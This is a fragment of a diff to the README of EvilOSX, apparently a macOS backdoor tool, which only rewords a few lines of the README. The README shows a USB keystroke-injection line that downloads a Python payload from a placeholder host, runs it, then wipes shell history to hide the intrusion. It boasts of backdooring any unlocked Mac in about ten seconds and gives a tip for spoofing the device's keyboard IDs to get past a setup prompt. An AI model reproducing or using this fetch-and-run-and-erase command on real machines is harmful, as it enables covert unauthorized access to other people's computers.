Marten4n6/EvilOSX/README.md

 STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear ENTER
 ```
-- Takes about 10 seconds to backdoor any unlocked Mac, which is...... *nice*
+- It takes about 10 seconds to backdoor any unlocked Mac, which is...... *nice*
 - Termina**l** is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise. <br/>
 - To bypass the keyboard setup assistant make sure you change the VID&PID which can be found [here](https://ducktoolkit.com/vidpid/).
 Aluminum Keyboard (ISO) is probably the one you are looking for.

 ## Versioning
 EvilOSX will be maintained under the Semantic Versioning guidelines as much as possible. <br/>
-Server and client releases will be numbered with the follow format:
+Server and bot releases will be numbered with the follow format:
 ```
 <major>.<minor>.<patch>
 ```